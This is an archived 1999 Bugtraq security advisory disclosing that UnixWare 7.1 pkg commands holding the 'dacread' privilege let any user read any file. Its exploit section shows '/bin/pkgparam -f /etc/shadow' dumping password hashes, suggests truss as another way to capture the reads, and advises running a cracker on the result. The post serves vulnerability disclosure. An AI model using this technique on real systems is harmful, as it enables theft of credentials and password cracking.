Bugtraq mailing list archives
UnixWare and the dacread permission
From: btellier () USA NET (Brock Tellier)
Date: Fri, 3 Dec 1999 21:21:17 MST
Greetings, OVERVIEW Any user may read any file on the system. BACKGROUND Only UnixWare 7.1 has been tested. DETAILS As previously stated, UnixWare binaries gain additional privileges via standard suid/sgid AND /etc/security/tcb/privs. The majority of the UnixWare "pkg" command, such as pkginfo, pkgcat, pkgparam, etc, are vulnerable to a bug which will allow any user to read any file on the system as a result of their additional "dacread" permission in the privs file. The dacread permission allows a process to override the Discretionary Access Controls (DAC) for read-only operations. Basically, a process with the dacread permissions is able to bypass the mode bits and ownership on a file, but only for reading it. A process with dacwrite permissions can bypass mode bits to write to or execute that file. I'm pretty sure that the bugs I found in the pkg commands were introduced by their addition to the privs file. As far as I can tell, there is virtually no reason for them to be able to read any file on the system. All around, this additional privilege thing, well, sucks. Consider now that the truss(1) command will allow the user to see any file i/o that happens between a process and the system since it isn't suid/sgid. Thus, if there is *any* way that you can make pkg* read from a file, even if the output is never printed, you can examine truss output to get the file's contents. EXPLOIT The worst offender of pkg* is pkgparam, which will print the contents of a file to stdout, though I've been able to get most of the pkg program to read from /etc/shadow in one way or another and grab the contents with truss. bash-2.02$ ls -la /bin/pkgparam -r-xr-xr-x 1 root sys 166784 May 21 1999 /bin/pkgparam bash-2.02$ /bin/pkgparam -f /etc/shadow Dy0l3OC7XHsj.:10925:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: *LK*::::::: *LK*::::::: *LK*::::::: BgusHRQZ9MH2U:10878:::::: *LK*::::::: *LK*::::::: *LK*::::::: *LK*::::::: *LK*::::::: nv.Xrh2V3vArc:10882:::::: ozT.yeRe1/dxY:10882:::::: RinwpQfqabYbc:10928:::::: bash-2.02$ Now just concatenate the first field of /etc/passwd with this file and run your favorite cracker. Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellier () usa net ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
Current thread:
- HP Secure Web Console Jon Mitchell (Dec 01)
- Re: HP Secure Web Console Alec Kosky (Dec 01)
- Re: HP Secure Web Console Keith Rice (Dec 02)
- Re: HP Secure Web Console GNSS Research Division (Dec 03)
- Re: HP Secure Web Console GNSS Research Division (Dec 03)
- UnixWare gain root with non-su/gid binaries Brock Tellier (Dec 03)
- UnixWare read/modify users' mail Brock Tellier (Dec 03)
- UnixWare and the dacread permission Brock Tellier (Dec 03)
- Apologies for wierd email Brock Tellier (Dec 05)
- Re: HP Secure Web Console Keith Rice (Dec 02)
- Re: HP Secure Web Console David Zverina (Dec 02)
- Re: HP Secure Web Console Alec Kosky (Dec 01)
- <Possible follow-ups>
- Re: HP Secure Web Console Mark Gross DSO (Dec 01)
- Re: HP Secure Web Console Randal L. Schwartz (Dec 06)
- Re: HP Secure Web Console Thillmann, Rolf (Dec 28)